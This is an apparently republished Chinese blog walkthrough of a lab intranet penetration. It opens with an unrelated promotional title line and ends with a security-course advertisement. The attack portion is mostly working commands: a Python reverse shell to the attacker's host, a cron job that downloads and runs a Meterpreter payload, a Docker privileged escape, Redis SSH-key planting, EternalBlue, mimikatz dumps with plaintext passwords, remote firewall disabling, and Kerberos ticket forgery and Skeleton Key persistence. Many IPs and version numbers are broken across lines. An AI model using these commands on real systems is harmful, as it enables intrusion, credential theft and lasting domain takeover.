核心内容摘要
18岁,不止是数字:汤姆叔叔为你点亮成人世界的璀璨星河
前言本文主要记录了作者之前在内网渗透的一个全方面的学习过程包括如何从外网找到入口点之后如何提权然后如何在内网中进行一个信息收集当存在域的情况下又是怎么收集信息然后通过代理来进一步横向不论是一层代理还是两层本文都有涉及以及一些常见的代理工具的
使用方法、权限维持的手法、痕迹清理、内网渗透过程的整一个渗透思路是怎么样子的做一个简单的分享同时希望能帮助到像我一样的小白能对内网渗透有进一步的了解最主要的是让像我一样的菜鸟找到学习的方向和方式打靶过程如下为本人自己搭建的练习靶场拿下web
nmap扫描
192.
168.
1
131 :81 —web2 (nginx)
Nday getshell-web2访问
192.
168.
1
131:81可以得到使用了Laravel框架信息该站点存在Laravel Debug mode RCE漏洞CVE-
利用工具laravel-CVE-
-EXP-main 搭配v
96-godzilla拿下shelldocker)注意该工具下getshell高版本的‘哥斯拉’不可行工具均于github下载https://github.com/SecPros-Team/laravel-CVE-
-EXPhttps://github.com/BeichenDream/Godzilla/releases/tag/v
96-godzilla
在docker中提权-web2拿下shell之后判断是否为docker如下图可以看到确实为docker容器中方式一利用suid权限find / -perm -us -type f 2/dev/null
通过执行上述命令攻击者可以遍历任何可执行文件在这里我们可以找到/home/jobs目录下有一个shell文件并且其具有SUID权限通过执行shell可以发现其执行的就是ps命令
利用python进行一个反弹shell到自己的kaliPython -c ‘import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“
192.
168.
5
1”,
);os.dup2(s.fileno(),
; os.dup2(s.fileno(),
; os.dup2(s.fileno(),
;psubprocess.call([“/bin/bash”,“-i”]);’
开始利用suid提权思路找到suid程序shell可执行文件 调用系统ps命令–修改PATH --创建ps文件内容为/bin/bash --将ps文件添加至PATH最前面最先调用–执行shell程序–通过PATH找到我们创建的ps文件执行命令–导致可利用suid权限执行任意命令!!!没有root权限是无法进行磁盘挂载的具体操作如下cd /tmp echo /bin/bash ps #写入ps内容 chmod 777 ps #授权 echo $PATH export PATH\/tmp:$PATH \# 将/tmp添加到环境变量中并且先加载执行/tmp里的程序 cd /home/jobs ./shell然后就获得了root权限可以执行命令了疑问一为什么写入到tmp目录
/tmp目录通常对所有用户都是可读写的
由于/tmp目录中经常有大量临时文件攻击者放置的木马文件可能不会立即引起注意
/tmp目录中的文件可能会被系统定期清理这可能有助于攻击者隐藏痕迹
docker逃逸拿下web2方式一Docker runC漏洞逃逸-失败攻击者重写宿主机上的runc 二进制文件攻击者可以在宿主机上以root身份执行命令需等待目标机管理员重启该docker容器payload就会触发https://github.com/Frichetten/CVE-
-PoC实验失败原因未知方式二Docker 特权模式逃逸-成功当管理员执行docker run --privileged时Docker容器将被允许访问主机上的所有设备并可以执行mount命令进行挂载将宿主机磁盘挂载之后添加计划任务—利用msf的web_delivery模块生成payload定时执行宿主机上线meterpreter具体操作
首先我们现在docker中新建一个/hack目录用来挂在文件mkdir /hack
然后ls /dev看到/dev目录会发现很多设备文件/dev目录是系统设备管理的核心部分几乎所有的硬件设备在/dev目录下都有一个对应的设备文件。
这些设备文件使得用户和程序能够以文件的方式与硬件设备交互
将 /dev/sda1 挂载到/hack目录里mount /dev/sda1 /hack如上图所示挂载成功了此时我们就可以通过访问容器内部的/hack路径来达到访问整个宿主机的目的使用metasploit的web_delivery模块生成payload命令use exploit/multi/script/web\_delivery set target 7 \# 选择目标系统 set payload linux/x64/meterpreter/reverse\_tcp set lhost
192.
x.x #kali地址 set lport 4444 exploit如上图将echo ’ * wget -qO m4aMAqCc --no-check-certificate http://
192.
168.
5
128:8080/fvjGoEx9Xu7ud97; chmod x m4aMAqCc; ./m4aMAqCc disown /hack/var/spool/cron/crontabs/root 将该命令写入宿主机的计划任务中即可上线meterpreter但是通过ifconfig可以看到出现了52段和93段和我们刚刚web的
1
131并不一样所以从这就可以大致判断是存在nginx反向代理拿下web1nmap得到6379–redis未授权写入ssh公钥
先前通过nmap扫描是可以得到6379的其存在redis未授权漏洞可直接连接那么我们可以通过写入ssh公钥来实现ssh连接具体操作如下ssh-keygen -t rsa #生成密钥(echo -e “\n\n”; cat /root/.ssh/id_rsa.pub; echo -e “\n\n”) key.txt #/root/.ssh/id_rsa.pub为公钥位置 其中换行的原因是避免和Redis里其他缓存数据混合cat key.txt | redis-cli -h
192.
168.
1
128 -x set xxx #把key.txt文件内容写入目标主机的redis缓冲里然后使用攻击机连接目标机器Redis分别执行如下命令将ssh公钥写入目标主机redis-cli -h
192.
168.
1
131注意这里设置备份路径的时候目标机器必须要是以root权限启动的redis否则会权限不足config set dir /root/.ssh # 设置redis的备份路径为/root/.ssh/SSH密钥存放的默认目录config set dbfilename authorized_keys # 设置保存文件名为authorized_keyssave # 将数据保存在目标服务器硬盘上写入成功后直接尝试连接通过ssh配合msf生成payload得到web1 的session内网穿透工具拓展/使用补充Kali ipEarthworm
工具介绍Earthworm简称EW是一款功能强大的网络穿透工具它具备SOCKS5服务架设和端口转发两大核心功能能够在复杂网络环境中实现网络穿透。
EW支持正向、反向以及多级级联的方式建立网络隧道实现网络穿透。
它适用于多种操作系统包括Linux、Windows、MacOS和Arm-Linux提供了丰富的跨平台支持二工具使用https://github.com/idlefire/ew服务端 ./ew_for_linux64 -s rcsocks -l 8899 -e 1888客户端 ./ew_for_linux64 -s rssocks -d
192.
168.
1
129 -e 1888成功访问52网段注意浏览器要挂代理
127.
0.
1:8899Frp
工具介绍FRPFast Reverse Proxy是一个开源的高性能内网穿透及反向代理应用它支持TCP、UDP、HTTP、HTTPS等多种协议。
FRP采用客户端/服务端C/S模式服务端部署在具有公网IP的机器上客户端部署在内网或防火墙内的机器上。
通过访问暴露在服务器上的端口FRP能够反向代理到处于内网的服务Tip版本frp
39 注意高版本和低版本启动的方式是不一样的高版本把frpc.ini改成了frpc.toml二工具使用Frpc.ini配置如下Frps.ini配置如下Tip:利用python和wget传工具服务端 frps -c frps.ini客户端 frps -c frps.ini如下图表现socks5搭建成功reGeorg由于当前环境ubuntuweb1没有web端服务因此先拿其他机子环境进行实验
工具介绍Neo-regeorg 是一个基于 Python 编写的用于正向代理和内网穿透工具采用 socks5 协议。
支持的脚本类型aspx、ashx、jsp、jspx、php下载地址https://github.com/L-codes/Neo-reGeorg二工具使用先使用regeorg生成代理文件python neoreg.py generate -k 123456生成之后key为你在生成时的连接密码连接命令为python3 neoreg.py -k 123456 -u http://
39.
101.
1
100/proxy.php -p 10080-k为密码参数-p为本地的端口10080weblogic查找路径C:\bea\workshop_
1
3\samples\domains\workshop\servers\cgServer\tmp_WL_internal\bea_wls_internal\5uaji9\war\找到临时文件工作路径后使用文件上传功能连接代理python3 neoreg.py -k 123456 -u http://
xxx.xxx.90:7001/bea_wls_internal/proxy.jsp -p 10080使用proxifier配置本地代理配置代理规则可正常访问内网NpsNPS下载地址https://github.com/ehang-io/nps/releases/下载后上传到vps运行以下命令mkdir nps-server mv linux\_amd64\_server.tar.gz nps-server/ cd nps-server tar -zxvf linux\_amd64\_server.tar.gz ./nps install ./nps start到此处成功启动nps服务端web默认端口8080服务端口8024访问网站默认账户密码admin/123点击客户端新增可只设置个验证密钥Windows自行更改npc.exe -server
。
.46:8024 -vkey1234 -typetcp(此命令为受害者主机运行)客户端登录之后会显示客户端地址需要记住客户端的id在socks5代理中配置新增后会在vps上1080端口开启socks5服务使用proxifier连接suo5
工具介绍Suo5是一个全新的 HTTP 代理隧道基于HTTP/
1的Chunked-Encoding构建。
相比Neo-reGeorg等传统隧道工具,suo5的性能可以达到其数十倍。
查看性能测试。
其主要特性如下
同时支持全双工与半双工模式传输性能接近FRP
支持在 Nginx 反向代理和负载均衡场景使用
完善的连接控制和并发管理使用流畅丝滑
支持 Tomcat Jetty Weblogic WebSphereResin等主流中间件
支持 Java4~Java 19 全版本,兼容性拉满同时提供提供命令行和图形化界面下载地址https://github.com/zema1/suo5可下载代码自行编译也可下载编译好的必须下载assets里的连接代码二工具使用在此文件夹中找到对应系统上传文件我们需要用的jsp文件找到网站根目录Weblogic访问目录http://
201.
147.
9
90:7001/bea_wls_internal/suo
jsp使用suo5客户端连接默认端口为1111自行更改linux版本命令为./suo5-linux-arm64 -t http://
xxx.xx.90:7001/bea_wls_internal/suo
jsp -l
0.
0.
0:1111然后需配置proxifier使用socks5代理即可访问## 横向移动
192.
168.
5
0给web1的session配置路由 route add
192.
168.
5
0
255.
255.
2
0 xx代表session的id 比如 3使用auxiliary/scanner/discovery/udp_probe 模块来扫描52网段的主机-----扫到
192.
168.
5
30 主机pc1配置路由的原因是告诉msf“路怎么走”接下来就是要搭socks代理是为了让其他工具同样“识路”在web1上可利用earthworm/frp/reGeorg/Nps/suo5性能强搭建socks5web1双网卡上是存在52段网然后搭配proxychains对52段进行nmap扫描proxychains4 nmap -Pn -sT -sV -F -O
192.
168.
5
30可以看到8080上有一个nginx的http服务尝试访问拿下pc1很明显这是一个通达oa的系统直接搜哈https://github.com/xiaokp7/TongdaOATool/releases/tag/v
6自此pc1也就拿下了内网信息收集常规操作ipconfig /all \# 查看本机ip所在域 systeminfo \# 列出系统信息 route print \# 打印路由信息 net view \# 查看局域网内其他主机名 arp -a \# 查看arp缓存 whoami net start \# 查看开启了哪些服务 net share \# 查看开启了哪些共享 net config workstation \# 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net user \# 查看本机用户列表 net user /domain \# 查看域用户 net localgroup administrators \# 查看本地管理员组通常会有域用户 net view /domain \# 查看有几个域 net user 用户名 /domain \# 获取指定域用户的信息 net group /domain \# 查看域里面的工作组查看把用户分了多少组只能在域控上操作 net group 组名 /domain \# 查看域中某工作组 net group domain admins /domain \# 查看域管理员的名字 net group domain computers /domain \# 查看域中的其他主机名 net group domain controllers /domain \# 查看域控制器可能有多台发现IPC远程IPCInter-Process Communication进程间通信主要指的是在不同计算机系统或在同一计算机系统的不同进程之间进行数据交换和通信的机制。
在Windows系统中IPC I n t e r n e t P r o c e s s C o n n e c t i o n 是一种特殊的共享资源它允许进程间通过命名管道进行通信以实现对远程计算机的访问。
I P C Internet Process Connection是一种特殊的共享资源它允许进程间通过命名管道进行通信以实现对远程计算机的访问。
IPC InternetProcessConnection是一种特殊的共享资源它允许进程间通过命名管道进行通信以实现对远程计算机的访问。
IPC共享依赖于特定的端口如139和445端口这些端口用于SMBServer Message Block协议负责文件和打印共享服务。
在实际应用中IPC 可以用于建立远程连接例如通过命令 n e t u s e I P i p c 可以用于建立远程连接例如通过命令 net use \\IP\\ipc 可以用于建立远程连接例如通过命令netuseIPipc “password” /user:“username” 可以建立与远程计算机的IPC 连接。
此外 I P C 连接。
此外IPC 连接。
此外IPC连接还可以用于文件传输、执行远程命令等操作。
然而需要注意的是不当使用IPC$可能会带来安全风险如被恶意用户利用来获取未授权的访问权限关键信息汇总域名whoamianony.org域控制器主机名为DC.whoamianony.orgIP为
192.
168.
9
30域管理员为AdministratorKiwi启动抓密码Ps migrate \[PID\] #挂载x64进程 load kiwi kiwi\_cmd privilege::debug kiwi\_cmd sekurlsa::logonPasswordsbunnyBunny2021administratorWhoami2021Tipmimikatz需要管理员权限才可以爬横向移动
192.
168.
9
0配置路由route add
192.
168.
9
0
255.
255.
2开始扫描93存活主机use auxiliary/scanner/smb/smb\_version set rhosts
192.
168.
9
3.
set threads 5 run扫到了
9
40主机继续用nmap扫一下使用earthworm搭建一个二级socks5代理服务攻击机 ./ew_for_linux64 -s lcx_listen -l 1090 -e 1234跳板机 ./ew_for_linux64 -s lcx_slave -d
192.
168.
5
128 -e 1234 -f
192.
168.
5
30 -g 1555Win7ew_for_Win.exe -s ssocksd -l 1555proxychains4 nmap -Pn -sT -sV
192.
168.
5
40没发现什么可有利用的服务我们直接打一个“永恒之蓝”试试setg Proxies socks5:
127.
0.
1:1090 use exploit/windows/smb/ms17\_010\_eternalblue set rhosts
192.
168.
9
40 set payload windows/x64/meterpreter/bind\_tcp set rhost
192.
168.
9
40 set lport 4444 exploit自此拿下pc2还剩下一个域控因为前期有了域管理员的密码直接尝试直接psexec登陆拿下域控首先利用域管理员账号把域控的防火墙给关了到pc1执行以下命令让Windows 7与域控建立ipc连接net use \
192.
168.
9
30\ipc$ “Whoami2021” /user:“Administrator”然后执行如下命令使用sc远程在域制器
192.
168.
9
30上创建服务关闭防火墙sc \
192.
168.
9
30 create unablefirewall binpath “netsh advfirewall set allprofiles state off”sc \
192.
168.
9
30 start unablefirewall直接psexec登陆use exploit/windows/smb/psexec set rhosts
192.
168.
9
30 set SMBUser administrator set SMBPass Whoami2021 set payload windows/meterpreter/bind\_tcp set rhost
192.
168.
9
30 run成功拿下权限维持票据白银票据
域名
域sid
目标服务器名
可利用的服务
服务账号的NTML HASH
需要伪造的用户名SID和所处域参考黄金票据whoami /usernet config workstation获取服务账号hashmimikatz.exe “privilege::debug” “sekurlsa::logonPasswords” ‘xxx.txt’制作白银票据使用mimikatzklist purge 清除票据kerberos::golden /domain:cyber.com /sid:S-
/target:dc.cyber.com /service:cifs /rc4:45bdd23a3b9fc1c44a9fbb4081a70b30 /user:aaaa /pttkerberos::golden /domain:域名 /sid:域sid /target:目标服务器 /service:目标服务 /rc4:目标服务器的hash /user:xxx用户名 /ptt黄金票据介绍黄金票证是一种权限维持手段攻击者获得了对 Active Directory 密钥分发服务帐户 KRBTGT 的控制权并使用该帐户伪造有效的 Kerberos 票证授予票证 TGT。
这使攻击者能够访问 Active Directory 域上的任何资源如果有 KRBTGT 哈希您可以伪造自己的 TGT其中包括想要的任何组成员身份的 PAC 数据前置条件:
KRBTGT的hash
本地管理员权限
域的sid普通用户的sid除去最后三位就是域的sid
域内任意用户的本地管理员权限利用mimikatz实现具体操作whoami /user 获取域的sid值(去掉最后的-500500表示为administrator用户)net config workstation 查看所处域获取krbtgt用户hash运行mimikatz.exeprivilegeg::debug #开启特权模式lsadump::lsa /patch #获取krbtgt用户hash,域的sidlsadump::lsa /patch /user:krbtgt #获取krbtgt用户hash制作黄金票据使用mimikatz此时我们已经拥有krbtgt账号的hash接下来切换到普通机器使用mimikatz制作黄金票据。
Kerberos::purgeklist purge 这两条命令可以清除机器中的票据以防干扰kerberos::golden /user:administrator /domain:cyber.com /sid:S-
/krbtgt:d40f0e3b1347e55dbfd6dc58e80a3b6e /ticket:ticket.kirbikerberos::golden /user:XXX任意用户名 /domain:域名 /sid:域的sid值 /ticket:XXX.kirbi(生成的票据名称)票据传递kerberos::ptt ticket.kirbidir \dc.cyber.com\c$利用impacket实现第一步打开管理员权限的命令行窗口并清空票据第二步制作ccache文件python ticketer.py -nthash d8d2ad72a119a8d418703f7a16580af6 -domain-sid S-
-domain whoamianony.ory administrator第三步更改环境变量set KRB5CCNAMEC:\Users\zhangsan\Desktop\impacket-examples-windows-master\administrator.ccache第四步验证成果python wmiexec.py whoamianony.ory/administratoryukong -k -no-pass利用impacket来进行票据的制作有一定的局限性制作完票据后在klist命令下是看不到缓存的。
也没办法使用net use \ip\admin$ 来建立管道连接。
但可以使用其自带的工具在在一定的命令格式下进行远控指定主机砖石票据区别黄金票据攻击和钻石票据攻击都需要访问krbtgt密钥。
然而钻石票据攻击需要访问AES256密钥。
黄金票证攻击则是利用伪造票证授予票证 (TGT) 而钻石票证攻击则利用了域控制器 (DC) 请求的真实 TGT 进行解密和重新加密进行票据攻击。
优势这种技术相比于金票更加隐蔽因为过程中所申请的TGT是真实的只是修改了PAC相对你金票离线生成TGT更符合OPSEC条件krbkey:3e65833fc9930ea83015501ec30c161da401faf6cfed9526b9ceff16c8ade745(AES256密钥) 低权限用户user:micle 用户密码password:Admin12345 domain:rootkit.org dc:owa
rootkit.org ticketuser:administrator //伪造的票据用户名可以任意不需要域中存在该用户具体操作使用 mimikatz 抓取 krbtgt 用户 aes256密钥mimikatz.exe privilege::debug lsadump::dcsync /domain:rootkit.org /user:krbtgt exit解密重构TGTRubeus.exe diamond /krbkey:3e65833fc9930ea83015501ec30c161da401faf6cfed9526b9ceff16c8ade745 /user:micle /password:Admin12345 /enctype:aes /domain:rootkit.org /dc:owa
rootkit.org /ticketuser:test123 /ptt /nowrap利用我们重新构造的TGT对域控的cifs服务进行票据注入Rubeus.exe asktgs利用klist查看票据蓝宝石票据区别蓝宝石票据与钻石票据类似票据不是伪造的而是通过请求后获得的合法票据。
他们的区别在于PAC的修改方式。
钻石票据是修改了合法PAC以添加特权组。
在蓝宝石票据中高权限用户PAC是通过S4U2SelfU2U获得的然后该PAC会替换原来的PAC由于该票据是完全合法元素组合起来的所以是最难检测的票据具体操作使用魔改过的 ticketer.pyhttps://github.com/ShutdownRepo/impacket/tree/6c9a1aadbfc11e321858a640b596530535b11fd1将域控的ip地址加入hosts使用如下命令生成票据python ticketer.py -request -impersonate ‘administrator’ -domain ‘rootkit.org’ -user ‘micle’ -password ‘Admin12345’ -aesKey ‘3e65833fc9930ea83015501ec30c161da401faf6cfed9526b9ceff16c8ade745’ -domain-sid ‘S-
’ -nthash ‘c3d5042c67ef5f461d0ba6ecdd9ea449’ ‘Sapphire’使用mimikatz导入该票据成功dir域控kerberos::ptc ignored.ccache由于该票据很难被检测到只能通过人工排查krbrgt账户被盗等情况入手Skeleton Key(万能密码)介绍Skeleton Key(万能密码)可以对域内权限进行持久化操作在本文中将分别使用Mimikatz和Empire来完成Skeleton Key的操作并分析其
使用方法和防御措施具体操作
在域控制器中以管理员权限运行Mimikatz之后执行以下命令将SKeleton Key注入域控制器的lsass.exe进程中mimikatz # privilege::debugmimikatz # misc::skeleton如上图所示系统提示Skeleton Key已经注入成功此时会在域中的所有账户中添加一个Skeleton Key其默认密码为mimikatz接下来就可以以域内任意用户的身份配合该SKeleton Key运行域内身份授权验证了我们可以在不适用域管理员原始密码的情况下使用注入的Skeleton Key成功连接系统例如net use \dc\ipc$ “mimikatz” /user:hacke\administrator可以看到已经与域控制器建立了连接我们之后可以列c盘的目录看看文章来自网上侵权请联系博主互动话题如果你想学习更多网安方面的知识和工具可以看看以下题外话题外话网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家
总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工
网络安全理论知识2天①了解行业相关背景前景确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。
非常重要
渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-
MS08-
MS10-
MS
等
操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础
计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现
数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固
Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。
薪资区间6k-15k到此为止大概1个月的时间。
你已经成为了一名“脚本小子”。
那么你还想往下探索吗【“脚本小子”成长进阶资源领取】
脚本编程初级/中级/高级在网络安全领域。
是否具备编程能力是“脚本小子”和真正黑客的本质区别。
在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。
在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。
超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。
感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。
网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。
一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。
网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。
相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。
特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失